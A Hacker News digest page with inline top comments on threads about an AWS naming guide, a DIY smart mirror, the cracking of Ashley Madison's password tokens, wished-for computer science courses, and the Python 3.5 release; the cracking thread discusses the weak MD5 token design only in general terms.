hacker news with inline top comments    .. more ..    14 Sep 2015 Best
home   ask   best   4 years ago   
Amazon Web Services in Plain English expeditedssl.com
1441 points by ins0  2 days ago   221 comments top 52
michaelbuckbee 2 days ago 16 replies      
Hey HN, I wrote this, thanks for all the feedback. In particular if I've mischaracterized the functionality of a service or you see something that's really off please email me at mike@expeditedssl.com or just tell me here and I'll fix it.
junto 2 days ago 1 reply      
What's amazing is the amount of services Amazon offers.

Whenever I look at my AWS console I see these reems of badly named services and I think to myself

 "after I've dealt with the current problem for which I've logged in AWS, I might get to figure out what all that other stuff actually is". 
However, I never do because there is more stuff to take care of, and since AWS doesn't make this easy to understand, you just don't bother. Now I know that AWS actually has some really useful stuff, and for things I would never have considered using Amazon for, like video processing (Elastic Transcoder), source control (CodeCommit) and OAuth as a service (Cognito).

They just seem to be bad at marketing their stuff. Here's an example: https://www.google.de/search?q=source+code+repository+online...

Why isn't CodeCommit here on the first page of the search results?

hopeless 2 days ago 2 replies      
Love this! Loved it so much I made it into a tampermonkey script: https://gist.github.com/ideasasylum/2d7518611ffaacbc5061

So now my Amazon dashboard looks like:https://dl.dropboxusercontent.com/s/iko1p8jdwdvjpaq/2015-09-...

timclark 2 days ago 3 replies      
"It's like: Stacking cash on the sidewalk and lighting it on fire"

Is an accurate description of a large number of products that I have been forced to use after various CTOs have played golf with a vendors sales team.

kevindeasis 2 days ago 1 reply      
It took me forever to understand what each services aim to do. Like I could have literally been a better programmer by spending all the time learning algorithms instead of figuring out what each of the aws services do. I wish I've had access to this post before.

I like the services they offer, I just really hate the names they gave it. Funny enough, Jeff Bezos said in an interview that names of a product is important #irony

stephenr 2 days ago 5 replies      
Let me preface this by saying I use AWS only when clients insist on it. I think there are much better options that don't lock their customers in anywhere near to the same level.

I think AWS has plenty of badly named services, but some of these suggestions are much worse worse (and have a huge American influence - that fascination with using brand/implementation names for a generic/standard item) than the current actual AWS name:

* Amazon Unlimited FTP Server - why? ftp is a transfer protocol. S3 is about storage. It should be called Amazon Storage Server. Which it basically is (Simple Storage Service - S3)

* Amazon Memcached - I don't used the service so I don't know if it's only binary compatible with memcached but if its a generic cache that has multiple interfaces (the page references redis too) then more generic term like cache (and elastic implies it can grow/expand) seems more logical.

* Amazon Beginning Cut Pro - wtf. Transcoding is literally the process of converting a file from one type of encoding to another. That seems to be what this does. Final Cut Pro is not a mere format converter, it's a non-linear editor.

* Device Farm - I'll only concede that maybe this should reference mobile devices, but the name seems pretty clear and concise.

* CodeCommit - how is "code commit" less clear than "github". By this logic, Apple's email client should be called "Apple Outlook" because Outlook was a well known email client on the market.

* EC2 Container Service - the reference to EC2 means its slightly non-obvious, but Amazon Container Service would be much better than something referencing Docker. Docker !== Containers.

* WorkDocs, WorkMail - seriously, you're just replacing "Work" with "Company" here.

* Storage Gateway - what are you trying to be obtuse? From your very description, this sounds like exactly what the name describes - a local gateway to a storage service.

* Elastic Map Reduce - the compute/processing part of Hadoop is Map/Reduce. How is "Hadooper" more clear than the current one?

* Machine Learning - you're just being facetious now, right?

* OpsWorks - again, why does their name have to reflect a single specific implementation of a fairly well understood term(s) - Operations, DevOps, etc??

edit: typos

jlebar 2 days ago 1 reply      
I have to say that I think "glacier" is an inspired name. It takes a negative -- slow data retrieval -- and turns it into a positive -- indestructible, huge, unstoppable.
unoti 2 days ago 3 replies      
When you're building a new app based around a handful of these services, how do you have any idea what it will cost to host your business on a startup? In the past I've avoided using these, and just used VPS servers doing my own thing, because it's really hard for me to, for example, guess how many database queries I'll do or messages I'll send between app components. I feel much safer saying that I can limit myself to N servers with so much memory. How do you make that jump to thinking the other way?
acre88 2 days ago 1 reply      
Sad that this is necessary, but glad someone did it. There are AWS services listed here which when explained this way I realize I might want to take advantage of.
michaelborromeo 2 days ago 3 replies      
Thank you for this.

I can't wrap my head around why Amazon would make names for some very useful services so inscrutable.

It's like the developers were put in charge of naming everything.

snorkel 2 days ago 3 replies      
Whoa errors!

* S3 is not FTP. It's more like static web hosting and storage.

* VPC is not a "colocated rack" as it doesn't offer physical placement of hardware. Amazon VLAN would be a better name. It's just private network address space.

czzarr 2 days ago 1 reply      
This was orders of magnitude more helpful than the thousands of words that describe AWS on the AWS website. Thank you.
byron_fast 2 days ago 1 reply      
Excellent! You seem to have overlooked "Elastic Block Store" which should be called "Disk".
pierceg 2 days ago 0 replies      
This is gold.

I wrote a quick and dirty chrome extension that adds these names to the dashboard:https://github.com/pierceg/Amazonese

sbt 2 days ago 2 replies      
So many ways to make your software depend on Amazon.
rburhum 2 days ago 1 reply      
The Direct Connect description is gold: "It's likeStacking cash on the sidewalk and lighting it on fire"

Pretty spot on...

angry_octet 2 days ago 4 replies      
I can't agree. This is like all those people who wasted money buying shop.com, and tv.com, when all the recognition is in ebay.com and youtube.com. If you listen to people talk about cloud services they say 'competitor-X's S3 clone', AWS owns the terminology.

Also, S3 is NOT some ftp service, it is a new concept. And why should they call Cloudfront instead Amazon CDN? Anyone using it knows what a CDN is and what Cloudfront is? Its like insisting Toyota call the Camry the Toyota Mid Size Car.

fenomas 2 days ago 1 reply      
Awesome. I wish there was a column to tell you Google's version of the same service, where applicable.
matthewrhoden1 2 days ago 0 replies      
This is awesome! I spent probably an hour or two yesterday wading through all of it to figure out exactly what each piece does. This make it really clear.
arbuge 2 days ago 1 reply      
SES is great for newsletters. We use it for that all the time. Not sure why this article concludes it's only a good idea for transactional email.
dankohn1 2 days ago 1 reply      
Has AWS deprecated any of the services they've launched? If not, isn't that almost unprecedented in the worlds of either enterprise software and SaaS?
wonjun 2 days ago 0 replies      
Thank you, such a great post, I'd like to try getting a certificate from expeditedssl on AWS next.
mcherm 2 days ago 0 replies      
This guide is surprisingly helpful. Oh, but Glacier (not a bad name, actually) should be "Amazon Storage for Backups".
colordrops 2 days ago 3 replies      
What should Lambda be called?
halfelf 2 days ago 0 replies      
Thanks for sharing. It's feeling like I've just weared some magic glasses for auto translating.
tragomaskhalos 2 days ago 1 reply      
Some of these names make you wonder if Amazon are more in love with their own cuteness than in actually getting people to use their stuff - "Elastic Beanstalk" FFS? Either way, Bezos should hire the author of this piece and make him product-naming czar.
ukd1 2 days ago 0 replies      
The SWF description is pure garbage; it's got nothing to do with EC2, or IronWorker at all. Oddly, I think it's named sanely - it lets you setup and manage a workflow using small bits of code.
ausjke 2 days ago 1 reply      
Lovely and really helpful. I used some AWS but never fully understand the rest services, Amazon really should have some 101 page for this on its own. Those names are painfully opaque to say the least.
Gys 2 days ago 0 replies      
Yes ! I need Plain-English-As-A-Service or maybe just Amazon-As-A-Service
tdebroc 2 days ago 0 replies      
Nice one:Machine LearningShould have been calledSkynet
cdnsteve 2 days ago 1 reply      
The fact that their service portfolio has grown so large that you need a guide to navigate through it is very telling. Has AWS grown too vast?
mattress 2 days ago 0 replies      
Why didn't I read this earlier?! I was at an AWS hackathon all day and it was my first time ever using any of their offerings . This would have been super useful.
edpichler 2 days ago 1 reply      
Why do people like to describe services in a complex way? Maybe to seems a more complex product than it really is, or too look like "specialists" speaking about stuff.

This is very common for small companies without marketing experience, but this happening in companies like Amazon and Microsoft (Azure), I can't understand.

lazyant 2 days ago 0 replies      
One of the good things about this is that when somebody comes again comparing AWS to any regular ISP's VM we can point at this to show that EC2 alone may not look favourably in a comparison, it's the other services in the vast AWS ecosystem that brings the value.
ximeng 2 days ago 0 replies      
How would you describe in a few words (in keeping with the theme of the piece)?

Where's the main danger as you see it

PuerkitoBio 2 days ago 0 replies      
Would be nice if the services' header linked to the official AWS product page.
rmason 2 days ago 0 replies      
Now if someone would write a book translating Linux commands into plain English it would be a best seller. Or in other words explain it like you would to an experienced Windows user.
wil421 2 days ago 0 replies      
Great post some of this stuff has been is a mystery to me. Probably one of the reason I use Digital Ocean. For my personal needs, a simple VM will do and they even let me attach my Keys before instance creation.
leoalves 2 days ago 1 reply      
DynamoDB is nothing like mongodb. Its more like a key/value database.
tomcampbell 2 days ago 0 replies      
Amazon literally should pay you for this. I will be signing up for some additional services now that I know what they are. Thank you.

Also, love the light application of humor.

taivare 2 days ago 0 replies      
Frustrating for the beginning developer , I could not even clearly see if they had an in-house service ,for image hosting , or is images3 their brand or 3rd party ? . . . !!
hmate9 2 days ago 0 replies      
Love it. Keep it simple. It is too often the case that writes assume their readers have the same knowledge as they do. Always assume your reader knows nothing.
disbelief 1 day ago 0 replies      
Possible alternative "should have been called" for Glacier: "Amazon Write Only S3"
explosivo2k2 2 days ago 1 reply      
This is great. One note: "injest" should be ingest.
ycosynot 2 days ago 0 replies      
It makes me think that eventually technology will be so vast, there will be a need for a 'Google Translate' of such terms.
mokkol 2 days ago 0 replies      
Such an awesome list. Really helpful! Thanks a ton!!
brixon 2 days ago 0 replies      
Best One:

It's like: Stacking cash on the sidewalk and lighting it on fire

kelukelugames 2 days ago 0 replies      
This should bed added as a new language in Google translate.
nu2ycombinator 2 days ago 0 replies      
Lambdas are missing
benjarrell 2 days ago 0 replies      
Is there something like this for Heroku?
adultSwim 2 days ago 0 replies      
Thank you
tragomaskhalos 2 days ago 1 reply      
Show HN: Make a programmable mirror github.com
1139 points by hannahmitt  2 days ago   131 comments top 49
davnicwil 2 days ago 2 replies      
What an absolutely awesome idea. I love things like this that just blend software and information into the physical environment seamlessly.

I see stuff like this and just think, yeah, now we're living in the future :-D Kind of reminds you how cumbersome and inappropriate it can be to have to pull out a dedicated black slab of glass to access all your information.

The future (at least the one I want) without a doubt is information distributed throughout and blended with the rest of the 'physical' environment so it can be accessed in a truly interactive, head-up manner, not always funnelled and filtered through a singular device - be that VR, AR, or just a load of nicely designed physical interfaces like this one.

servercobra 2 days ago 7 replies      
I'm guessing this is based off [1] which uses a normal monitor and a Raspberry Pi.

This one looks much quicker and simpler than [1], but what if you need to do anything to the tablet (updates, new app, etc)? Remove it and re-adhesive?

Personally, I've been working on doing the same with an RPi and Hover so I can wave my hand in front of the mirror to swipe to new screens/info.

[1] https://www.raspberrypi.org/blog/magic-mirror/

lazaroclapp 2 days ago 5 replies      
Does the device's camera work from behind the one-way-mirror? Specifically, does the device camera work well enough from behind the one-way-mirror to do accurate face recognition? (the idea being that it can display different information for different users and have at least a soft "biometric" privacy lock).

Also, would color images be displayable through the one-way mirror or only white will make it intact?

swamp40 2 days ago 1 reply      
Looks perfect for daily affirmations.

"Good morning, Dave. MY, you look handsome today!"

Kiro 2 days ago 1 reply      
This needs a Kickstarter. I would back it immediately.
nivla 2 days ago 0 replies      
Nice work! I first came across this concept a few years back when someone posted an instructable which I believe he was building a Magic mirror for his daughter [1]. I re-implemented the idea but with a spooky tone, ie. it is framed as a regular mirror in the living room and when a guest stares at it long enough, something spooky jumps into the view. This was done using a VGA monitor, camera and a netbox pc. It was a fun project. If I were to go at it again, I would just use a cheap android tablet solely based on price, simplicity and power consumption. Will also make it useful this time with display of data that interests me than a novelty toy.

[1] http://www.instructables.com/id/The-Magic-Mirror/

barcoder 1 day ago 1 reply      
Here's a face tracking version I made a couple of years back: https://vimeo.com/13156714

It just uses a webcam and detects faces with (the now obsolete) Haarcascading face algorithm.

rmxt 2 days ago 1 reply      
This is really neat, but not having a spare Android tablet lying around, I'm left wondering: is there any cost-effective way to magnify a small screen, say that of a SGS3, to a larger size? Anyone have any tricks of light, like angled mirrors or prisms, up their sleeves to achieve such an effect in a thin depth? I don't get the impression that resolution is all that important if all it's going to be used for is a few lines of monochrome text and symbols.
pwnna 2 days ago 2 replies      
This is really cool! Although the title could be better, initially I thought this is talking about mirrors that can be programmed to adjust its properties (like tilt, curvature), much like those fancy telescope mirrors, although I'm unable to find a link now.
eflowers 2 days ago 1 reply      
That weather readout would look great with some slick weather icons:


mikado 2 days ago 0 replies      
We made a similar project last year with voice controller


pierrec 2 days ago 0 replies      
I wonder if a touchscreen version is doable using the frustrated total internal reflection technique [1]. Relatively cheap projects have been done with that technique, but never with a mirror, AFAIK.

It's somewhat different since it requires a sizable box behind the surface and an internal projector instead of the screen. As for turning it into a mirror, it might be as simple as adding a two-way mirror under the Plexiglas pane (or possibly between the pane and the diffuser layer). But this is where experimentation becomes necessary!

[1]: http://cs.nyu.edu/~jhan/ftirsense/

natebleker 2 days ago 2 replies      
It would be really cool to add facial recognition at like 0.5hz to the phone so that it only turns the screen on when you're looking at it. Or alternatively customize the content based on who's present in front of the mirror.
jgh 2 days ago 2 replies      
On first glance I thought the mirror said "Wear pants today" as if the mirror should know whether or not my legs will get cold...
userbinator 1 day ago 1 reply      
A few years ago it was really popular for home entertainment electronics like stereo systems and DVD players to use this trick to make the display appear to be "floating" on a mirrored surface. (Example: http://regmedia.co.uk/2011/07/21/philips_bdp7600_blu-ray.jpg ) More recently, I've seen people with phones whose screen protector is made out of this material.

(Personally, the idea of putting a device with a camera and microphone behind a two-way mirror just feels a bit too much like a telescreen for me.)

knowaveragejoe 2 days ago 2 replies      
I wish this went into a bit more detail about working with the mirror itself. Do you actually need a 2-way mirror? Or can you simply use something with that coating on one side?
roberthahn 1 day ago 1 reply      
If you want to build an interactive programmable mirror, looks like Nanogest might be useful: http://www.nanocritical.com/nanogest/ It's available for both iOS and Android.

It recognizes 4 swipe gestures (top, down, left, right) and a wave gesture.

It's a library so you'd still have to build the information display part.

resc1440 2 days ago 0 replies      
Might want to electrical-tape over the phone's front-facing camera, and maybe even excavate out its microphone. Just In Case.
soared 1 day ago 0 replies      
I did something similar, but used Windows 10 and rainmeter, which lets you place widgets/images on your desktop.https://i.imgur.com/LKxxvVI.jpg

reddit thread: https://www.reddit.com/r/Rainmeter/comments/3hzy4b/something...

andrepd 2 days ago 0 replies      
Great idea! It's stunning how this sort of futuristic seeming technology is actually possible using $50 in consumer electronics!

But passive display of information is only part of the story. You have the hardware: a microphone and a speech recognition API. Build voice interaction with this. Even simple commands like "Show me the weather tomorrow", or "Show me my calendar" add an amazing new depth to it. I can imagine myself, shaving and idly telling my mirror to show me my appointments today. :)

Animats 2 days ago 0 replies      
Decades ago I saw this done for auto rear-view mirrors, at Ford's research lab in Dearborn. Way ahead of its time.

If you have to operate electronics in a damp environment, use "Fine-L-Kote" conformal coating on the electronics. Mask all connectors, switches, and the screen face itself, then spray. Inspect with a UV light to see if you missed anything. Most automotive electronics gets a conformal coat, but, annoyingly, most handheld devices do not.

knightofmars 2 days ago 0 replies      
I did some research into two way mirror vendors a while ago to hide my TV and stumbled upon this operation out of Ohio. I never ended up finishing the project and as such never ordered from them so I don't know much about the company. They do have a wide range of two-way mirror options.


devonoel 2 days ago 1 reply      
Really cool idea, but more importantly, why do some people call a one-way mirror a two-way mirror? Its only a mirror on one size.
pavel_lishin 2 days ago 2 replies      
I wonder if humidity and steam would be a problem if this was done in a bathroom.
mundo 2 days ago 0 replies      
Super cool! Looks like a great anniversary present for the missus. I'm comfortable doing android development, but for those that aren't, have you thought of adding some config buttons for setting the birthdays and whatnot and releasing it in the google store?
adanto6840 2 days ago 0 replies      
Not sure if it's this article or not (wouldn't surprise me), but there's a number of "one way mirror" plastic/acrylic sheets on Amazon, with Prime shipping. But all of the larger, more practical ones are sold out as of a few minutes ago, hah. ;-)

Awesome project.

codingdave 2 days ago 0 replies      
I do like this. It is clever.

But when I did something similar for my family, which displayed everyone's chores for the day, and any events we had going on, I simply mounted a tablet on the wall of the kitchen, and wrote a web page to display the info.

jonknee 2 days ago 0 replies      
Years ago I stayed in a hotel once that had mirrors like this by the elevators. They were displaying the current weather and day's forecast I believe. I've wanted one ever since!
seangarita 2 days ago 0 replies      
This is really cool!

I built one of these with Facial Recognition for my Capstone project. http://lookingglass.co

mholt 2 days ago 0 replies      
This is way more affordable than the same thing I saw at Harrod's for like $10,000. Awesome project! Can't wait to try this.
suyash 2 days ago 1 reply      
Ask HN : Absolutely the coolest thing I've seen in a while. Can someone explain, how the phone screen is being displayed in the mirror? It is behind the mirror, it's not in front of it? Since the mirror won't understand touch, there is no touch based control and one needs to pull the phone out to change app etc right.


danpeddle 1 day ago 0 replies      
Great idea! Repurposing old tablets / mobiles is the cherry on top. Fascinating how combining otherwise dumb material with smart technology produces something so compelling.
joshmn 2 days ago 0 replies      
Love this idea, but removing the device (if you have to) is what rubs me the wrong way.

Anyone have any idea on the implications of mounting the device, say, 3mm away from the mirror? I think that would be about the depth of a case... and if you mount it inside a case, you can remove it seemlessly.

jscheel 2 days ago 2 replies      
I've been working on a voice-controlled one of these. I just got my Raspberry Pi, but am still working on the software side quite a bit. I'm not really having great success with CMU Sphinx's hotword detection.
brunorsini 2 days ago 2 replies      
Any suggestions for stores similar to Canal Plastic Center in San Francisco?
aakilfernandes 2 days ago 2 replies      
Pretty cool. I'd want to try this out on a kindle paperwhite and see if it would work.

How obvious is the rectangle of light? I can't see it at all in the first pic, but can make it out a little in the last pic

epalmer 2 days ago 1 reply      
This is a project I could get into. Full Maker on. I like the details provided and the images. I'm thinking about using some other display than android phone since I don't have one.
gus_massa 1 day ago 0 replies      
I'd like that the "consider no biking " message had the bike image with a strikethrough.
maresca 2 days ago 0 replies      
I have an old nexus I don't use often and would like to attempt this. Anyone know of any good mirror suppliers in the south jersey/philadelphia area?
thehooker 2 days ago 0 replies      
This is awesome!

It would be nice if this mirror could sync with your main device using wi-fi. So it would always be up-to-date with your stock options, birthdays and stuff like this.

swah 2 days ago 0 replies      
Can the "two way mirror" be created with "reflective window tint" (insulfilm in Brazil) glued onto a transparent acrylic sheet?
msie 2 days ago 0 replies      
Would using an iPad Pro be overkill?
alwaysdoit 2 days ago 0 replies      
Does the tablet's touchscreen work through the mirror, or is this read-only?

It's still really cool either way.

kevinaloys 2 days ago 0 replies      
This is absolutely fan fucking tastic!!
zekenie 2 days ago 2 replies      
I wonder how this would work with the new Raspberry Pi display
huangc10 2 days ago 1 reply      
looks awesome! is that an iron ring I see?
cm2187 1 day ago 0 replies      
Heavily influenced by Snow White!
g10r 2 days ago 0 replies      
very awesome!
How we cracked millions of Ashley Madison passwords cynosureprime.blogspot.com
371 points by ctz  3 days ago   166 comments top 16
djrogers 3 days ago 8 replies      
The real lesson here is that when you fix your mistakes, go back and fix your mistakes retroactively!

AM used an insecure login token at one point, and 3 years ago they fixed it. They switched from an MD5 of lower(pass)+username to an MD5 of the bcrypted pass+username, which is no longer reversible.

Apparently they never updated all of the previous login tokens though, so anyone who had created an account before the new secure system was put in place still had a vulnerable token stored.

When it comes to security, when you fix something - fix it for everyone people! Even if it's hard.

The good news for these folks is that the passwords revealed appear to be over 3 years old, and we all chang our passwords more often than that, right????

jand 3 days ago 1 reply      
For a non-native speaker, could you please confirm or invalidate my understanding of this interesting text:

1. They attacked some login/api-token unrelated to bcrypt.

2. If I use bcrypt-validate for logins and only temporarily associate rotating, random login/api-tokens with an account, I should not be prone to such attacks.

Thank you very much for your help.

snowwolf 3 days ago 6 replies      
The title of the article should really be changed to"How we cracked millions of Ashley Madison passwords by bypassing their strong bcrypt hashes because they thought they were clever" but that's less clickbaity

Also, never ever roll your own encryption - it will be flawed (unless you employ at least 3 crypto experts and get it peer reviewed - and even then it's probably still flawed).

dsp1234 3 days ago 2 replies      
I recently found out that piwik also uses a login token of the MD5 of the password[0]. So this mistake is still very prevalent.

If you want to provide a one-click automatic login to Piwik for your users, you can use the logme mechanism, and pass their login & the md5 string of their password in the URL parameters:


[0] - http://piwik.org/faq/how-to/#faq_30

nly 3 days ago 0 replies      
Don't worry. One day we'll have a standard for web login using hard hashes and solid PAKE protocols. Right? ...right?

Nevermind then, let's go back to berating sysadmins for implementing crypto improperly.

flipp3r 3 days ago 1 reply      
tl;dr they had a bad implementation and used md5 previously
nilved 3 days ago 7 replies      
What's the risk of using plaintext passwords if we assume every user is employing long, random, unique passwords? This has always seemed like a non-issue to me because I've been using a password manager for a half-decade.

e: Downvoting questions is mean. FWIW I always use bcrypt.

lostgame 3 days ago 2 replies      
I used to work for these guys. Their CEO was probably the single most selfish douchebag I'd ever met.

Glad this happened to them. 'bout time Karma came a'knocking.

Oh, p.s. can confirm all women (at least 90%) are bots.

tempVariable 3 days ago 1 reply      
Like protecting your business with an industrial grade door locks on a building made of hay. Just a whole lot of cheating going on over there, ouch.

edit: I don't know if this came up before, but based on how they stupidly tried to cache the login session tokens with md5, instead of running through the 12 work factor bcrypt, I can assume that they saw this as a bottleneck.

Instead of dropping the work factor or doing this caching baloney, could a service be made that runs on extravagantly fast hardware, which provides an API for strong, high work factor bcrypt, pbkdf2 based authentication.

I can assume that at around 10 rounds, each attempt takes about 50 - 100 millis

Thoughts ?

grandalf 3 days ago 0 replies      
> This meant that we could crack accounts created prior to this date with simple salted MD5.

This means that there was a decision not to force previously created accounts to update their passwords to make their accounts more secure.

Contrast this with the big Evernote vulnerability where all users were required to reset their passwords.

aruggirello 3 days ago 1 reply      
One point is not clear to me: did the crackers know $username's already, or did they perform some kind of dictionary attack? Brute forcing both $username and $password out of millions of hashes seems a bit hard - even considering md5 trivial, not employing an hmac scheme.
wbhart 3 days ago 4 replies      
The domain name appears to be an anagram of Sony Pure Crime.
chinathrow 3 days ago 2 replies      
I abandon any sites which give me direct logins via URLs sent over plain text emails.

I know, password reset keys are as bad as login keys, but usually they expire after a certain time frame.

F*ck login keys.

sparkystacey 3 days ago 0 replies      
It would be awesome if some data scientist took the list of passwords and figured out the top 100 for cheaters.
amelius 3 days ago 1 reply      
The article assumes that the reader knows what MDXfind is. Can somebody explain? Is it a brute force tool?
anc84 3 days ago 0 replies      
Computer Sciences Courses That Don't Exist, but Should dadgum.com
407 points by Scramblejams  3 days ago   244 comments top 44
insaneirish 2 days ago 9 replies      
Can I add another one? How about "The Network Doesn't Work The Way You Think It Does: A Distributed Systems Survival Guide".

As someone who has spent a good chunk of their career building high performance networks and another chunk of it working closely with developers who care a lot about those networks, I'm constantly amazed at how little top tier graduates from well respected schools know about networks.

Relatively basic stuff, like what does your application's traffic look like on the wire, how an OS determines what to do with a packet, how latency affects applications, and many other things are completely foreign to way too many developers. I could go on and on, but given the connected nature of things today, it seems like a very overlooked area.

bliti 2 days ago 3 replies      
CSCI 0666: Implementing Reverse Binary Trees on whiteboards.

CSCI 0123: Implementing Monads in COBOL

CSCI 0555: Successfully correcting internet commenters.

CSCI 0556: Nitpicking points made in CSCI 0555.

CSCI 0777: Introduction to twitter bot polynomial time algorithms with an emphasis on winning shitty contests.

CSCI 0911: Learning functional programming with Haskell.

CSCI 0912: How come up with uses for knowledge acquired in CSCI 0911.

fizixer 2 days ago 2 replies      
Okay time to upset people:

Dear 'All CS Departments of the World':

Please stop fooling your students in the 'Intro to Algorithms' class, and just rename it to 'Intro to Combinatorial Algorithms'. Because that's what you teach, and you completely ignore the arguably bigger area of 'Intro to Numerical Algorithms'. Numerical Algorithms, that are not only the basis of pretty much every branch of computational science (comp. physics, comp. chemistry, comp. biology, comp. civil engineering, comp. mechanical eng., comp. electrical eng., comp economics, comp. statistics, and on and on and on), but it's also one of the weakest link for a CS graduate to transition to Machine Learning and Data Science.

Or you could keep the course title, but upgrade the class, by teaching 50% of it as 'Algorithms and Data Structures', and 50% as 'Numerical Methods and Scientific Computing'.

Unrelated to above but relevant to the thread: Allen Downey and his team at Olin College are doing things worth looking into. (His Google techtalk: https://www.youtube.com/watch?v=iZuhWo0Nv7o)

WestCoastJustin 2 days ago 5 replies      
How about "Building an End-to-End Software Solution - 101". Going through the entire development workflow (idea, design, prototype, beta release, delivery, and iteration). One of my good friends is currently going through school, but in the back of my head there is this nagging thought, that he will not learn what's needed for today's market.
ctdonath 2 days ago 5 replies      
CSCI 1200: Debugging

Seriously. This should be a full subject addressed in detail, and early, unto itself. Instead it's typically a sink-or-swim byproduct of trying to pass any other science/engineering class.

stormbeard 2 days ago 5 replies      
Seriously though, it's probably time to separate Computer Science and Software Engineering into different routes of study.
blt 2 days ago 1 reply      
It's not enough to fill a class, but I really wish school had taught me about linkers, dynamic libraries, and calling conventions. AKA "why must I use this old compiler to link against this old closed-source C++ library?"
arfar 2 days ago 8 replies      
>UNIX "ls" tool is a case study in excessive command line switches.

'ls' is a bag of weird (bad?) UX. When first starting on the command line, I could never figure out how grepping the output of ls actually worked. Then I think I looked at some of the code, or someone told me, that when ls outputs, it checks to see where the data is going, if it's STDOUT then it pretty prints columns (and probably other things), otherwise it just the more sane 1 line per item.

Tloewald 2 days ago 2 replies      
Unlearning Object Programming might include discussion of the legitimate uses of global variables, and how Singletons are just obfuscated and inconvenient globals.
yakult 2 days ago 2 replies      
How To Prevent Scope Creep Without Alienating Your Boss Or Other Important People
piyushpr134 2 days ago 2 replies      
How about1. Version control systems and how to use them always2. Practical introduction to sql and nosql databases3. Database schema design along with practical projects4. Introduction to HTTP5. Introduction to Web frameworks 6. Introduction to mobile development7. Mobile app design basics8. How to clear job interviews


jnpatel 2 days ago 0 replies      
> Includes detailed study of knee-jerk criticism when exposed to unfamiliar systems.

This hits home.

thinkingfish 2 days ago 3 replies      
CSCI 4035: Refactor Your Own Term Projects from Past Semesters
solomatov 2 days ago 2 replies      
I think, another course should be CSCI 9000: How not to be opinionated jerk.
xacaxulu 2 days ago 1 reply      
Maybe just a CS program staffed entirely by people who've had real CS jobs outside of the academia bubble.
notacoward 2 days ago 1 reply      
CSCI 2020: How to Store Data

Discover the fascinating differences between fflush, fsync, and data actually hitting disk. Learn why single-byte writes are a dumb idea, and why accessing data through a cheap one-gigabit switch might not be as fast as accessing it locally. As preparation for being actual storage developers, students will be blamed for the professor's own mistakes, and for every problem that happens anywhere else in the system.

andrewstuart 2 days ago 1 reply      
How about "Programmer psychology: recognising and dealing with your own dogmatism through to diplomatically dealing with the dogmatism of other programmers."
thetruthseeker1 2 days ago 0 replies      
I am a software engineer, I have a grad school degree in CS with many years of experience in the industry. One thing I often noticed was many people break some key computer science concepts while on the goal to achieve some minor usability improvements or some other minor goal such as code reuse.

There was one instance where in a multiprocess environment, one of the engineers wrote some library to access a database table and read its contents. In the process he/she maintained a cache of it in memory. Then somebody else decided to use that convenience library/methods in a different process and so on.., essentially cache coherence problems were left unsolved and when I brought this to the attention of people they shrugged it off saying when they see a problem they might handle it - which may be fine, but seemed like some key computer science concepts were overlooked in the goal to achieve software reuse (here reuse of existing accessor/cache code to the database)

I have seen design choices that cause race conditions or non-determinstic behavior, following some patterns or cargo cult programming because something is an industry trend etc.

simonw 2 days ago 1 reply      
I love "Unlearning Object-Oriented Programming".
hackerboos 2 days ago 3 replies      
These are Software engineering mostly and not CompSci.
jason_s 2 days ago 0 replies      
smrtinsert 2 days ago 0 replies      
COMP000 Your Job Isnt Only Fun Shit
bb0wn 2 days ago 0 replies      
This would more aptly be titled 'Software Engineering Courses That Don't Exist, but Should.'
cLeEOGPw 2 days ago 0 replies      
These should exist if universities had a goal of producing not scientists, but workers.
matthewbauer 2 days ago 1 reply      
CSCI 0201: Principles of Version Control
FrankenPC 2 days ago 0 replies      
Reminds me of a question a help desk person asked me about 20 years ago. They were having all kinds of problems printing word docs from this new windows 95 PC. I was busy at the time so rather than educate them on the nature of WYSIWYG I just told them to update/repair the graphics driver. It worked and they thought I was a god.

It's hard to create a course on the interconnections of everything. The best course I ever took was a Cisco IOS programming course. That included protocol analysis, debugging routers, switches, etc. I'm not a network layer programmer. But what I learned about how everything works together has helped me solve complex problems ranging from Kerberos authentication issues to finding duplicate DHCP servers on the same network. Without this knowledge, I would have to hire experts and waste a ton of time and money to get to the end goal which is a functioning product.

garfieldnate 22 hours ago 0 replies      
I would take that classical programs class in a heartbeat. That seems like something that could be organized online somewhere.
EugeneOZ 15 hours ago 0 replies      
"I'm so cool I'm going against the crowd" bullshit.
bwang29 2 days ago 3 replies      
How about a "class" or some pre session on best practices of typing on the keyboard in the CS departments?

For year, I'm still struggling to type without looking at the keyboard and I make frequent typos which slow me down. Being able to type quickly and have a good habit of placing fingers on the keyboard seem to be an important exercise. A guideline to choose the right keyboard, setting up personal shortcut or customized keyboard layout for each developer might also be worth learning.

spydum 2 days ago 1 reply      
Automotive Metaphors and analogies for programmers

Seriously, why does every analogy have to be a car? Is it just the most complex system we can model in our heads?

msoad 2 days ago 0 replies      
Where I come from Software Engineering and Computer Science are two different paths.
zyxley 2 days ago 1 reply      
I'd like to suggest a course in: how to argue with management about system or vendor implementations that you know will affect both future development time and user experience within your company.
thinkingfish 2 days ago 0 replies      
CSCI 3350: Debugging- Beyond Print

CSCI 4600: When Big-O Complexity Becomes a Lie and Why

smegel 2 days ago 0 replies      
CSCI 2550: Software complexity and the art of Keeping It Simple.
kevindeasis 2 days ago 0 replies      
CSCI 099: How to apply what you learned in comp sci.
2sk21 2 days ago 0 replies      
No disagreements except that I might rename "Classical Software Studies" as "Software archeology"
asgard1024 2 days ago 0 replies      
Classical software studies? What about System 370, CP/CMS, IMS, CICS? There is so much that was forgotten.
pjtr 2 days ago 0 replies      
CSCI 0001 'RTFM & Learning simple facts yourself outside a CS course'
loaaa 2 days ago 0 replies      
Another course should be network security for everyone
gull 2 days ago 0 replies      
How to program by listening to your intuitions, not logically.
kriro 2 days ago 0 replies      
CSCI 3300 kind of exists in human computer interaction.
jecjec 2 days ago 0 replies      
How about:

-Mastering Git (/competitors)


-Project Management

-History of consumer information technology

alt_f4 2 days ago 0 replies      
dave_chenell 2 days ago 0 replies      
this is so good
Python 3.5.0 python.org
398 points by korisnik  11 hours ago   119 comments top 22
redsymbol 8 hours ago 3 replies      
Python 3 keeps getting better and better. I've been writing more code in Python 3 than 2 for about three years now, and I absolutely love it. When I have to write code in 2.7 now, it feels like shifting from fifth gear down to second.
ceronman 8 hours ago 0 replies      
So far, this is my favorite 3.x release. Typing annotations, async/await, unpacking generalizations. Lots of cool new features. Too bad that PEP0498[1] didn't make it in this release, we'll have to wait for 3.6.

[1] https://www.python.org/dev/peps/pep-0498/

ricw 11 hours ago 5 replies      
